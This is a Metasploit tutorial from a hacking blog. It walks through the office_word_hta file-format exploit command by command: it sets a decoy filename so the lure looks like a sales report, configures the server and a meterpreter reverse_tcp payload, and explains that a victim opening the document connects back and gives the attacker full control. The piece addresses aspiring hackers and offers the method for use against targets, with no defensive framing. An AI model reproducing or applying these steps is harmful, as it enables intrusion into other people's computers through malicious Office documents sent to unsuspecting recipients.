Metasploit Basics, Part 11: Exploiting Fileformat Vulnerabilities in MS Office

Welcome back, my fledgling hackers!

As the operating system developers become more and more security conscious, operating system exploits become rarer. Not so rare that we don’t see them anymore (see ExternalBlue and the .NET vulnerability CVE-2017-8759), but rare enough that hackers tend to focus their efforts on the applications and their output files for exploitation. These might include such things as PDF, .doc, rtf, .jpg, .lnk and .xls files. These type of exploits are referred to as “file format” exploits because they exploit a particular file format.

Metasploit has a large number of these file format exploits. To find them, we can go to the:

/usr/share/metasploit-framework/modules/exploits/windows/fileformat

directory in Metasploit. There, we can find numerous exploits that fit the file format category. One of the best and most recent is known as the Office Word hta exploit.

This exploit, first found in the wild in late 2016, enables us to create a carefully crafted Office document that when opened by the target will embed a rootkit within their system and give us complete control.

Let’s look at this exploit in this tutorial.

Step #1 Fire Up Kali and Open Metasploit

Step #2 Search for Office Word hta exploit

With the Metasploit console now open, let’s look for this exploit.

msf> search type:exploit fileformat

As you can see above, Metasploit returned a large number of exploits, but I highlighted the “Malicious Office Word Malicious Hta Execution”. That’s the one we want to use here.

Step 3 Load the Office Word HTA Exploit

Let’s now load that exploit.

msf > use exploit/windows/fileformat/office_word_hta

Now, with the exploit loaded, let’s take a look at the information on this exploit.

msf > info

As you can see above, this exploit creates a malicious RTF file that will enable us to execute our code on the target system when they open it. That’s exactly what we want to do!

Step #4 Show Options

The next step is to take a look at our options for this exploit.

msf > show options

As you can see, we need to set the FILENAME (it defaults to msf.doc. Not very stealthy), the URIPATH and the SRVHOST.

msf > set FILENAME hackersarise_sales_report

msf > set URIPATH hackersarise

msf > set SRVHOST 192.168.1.115

Step #5 Set The PAYLOAD

The next step is to set the PAYLOAD we want to embed on the target system when they open the file. Let’s choose our powerful and trusty /windows/meterpreter/reverse_tcp

msf > set PAYLOAD windows/meterpreter/reverse_tcp

When we once again “show options”, we can see that we need to set the payload LHOST.

Let’s set it to our Kali system

msf > set LHOST 192.168.1.115

Now, all we need to do is enter exploit and Metasploit generates a file named hackersarise_sales_report and places it in /root/.msf4/local directory. It then starts a server at 192.168.1.115 on port 8080. Now, all we need to do is send the file to the target and we then open it, it will connect to our server and download the meterpreter and connect back to our Kali system giving us unfettered access to their computer.

We should receive a meterpreter prompt like that above.

Keep coming back my fledgling hackers on how to use Metasploit for hacking in this “Metasploit Basics” series and nearly every other form of hacking on Hackers-Arise!